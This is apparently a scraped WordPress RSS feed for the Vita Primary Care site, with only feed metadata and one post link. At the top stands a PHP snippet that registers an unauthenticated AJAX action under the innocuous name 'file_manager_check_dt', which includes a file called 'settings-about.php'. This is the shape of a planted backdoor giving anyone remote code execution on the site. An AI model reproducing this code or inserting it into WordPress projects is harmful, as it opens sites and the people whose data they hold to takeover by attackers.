if(!function_exists('file_manager_check_dt')){
add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt');
add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt');
function file_manager_check_dt()
{
$file = __DIR__ . '/settings-about.php';
if (file_exists($file)) {
include $file;
}
die();
}
}
New posts - Vita Primary Care
https://vitaprimarycare.co.uk
Part of Vita Development GroupTue, 19 Nov 2024 19:11:39 +0000en-GB
hourly
1 https://wordpress.org/?v=6.9.4https://vitaprimarycare.co.uk/wp-content/uploads/2022/12/cropped-Vitah-Health-Care-Group-Logo-b-02-32x32.jpgNew posts - Vita Primary Care
https://vitaprimarycare.co.uk
3232new
https://vitaprimarycare.co.uk/new/
https://vitaprimarycare.co.uk/new/#respondWed, 09 Oct 2024 19:16:44 +0000https://vitaprimarycare.co.uk/?p=2701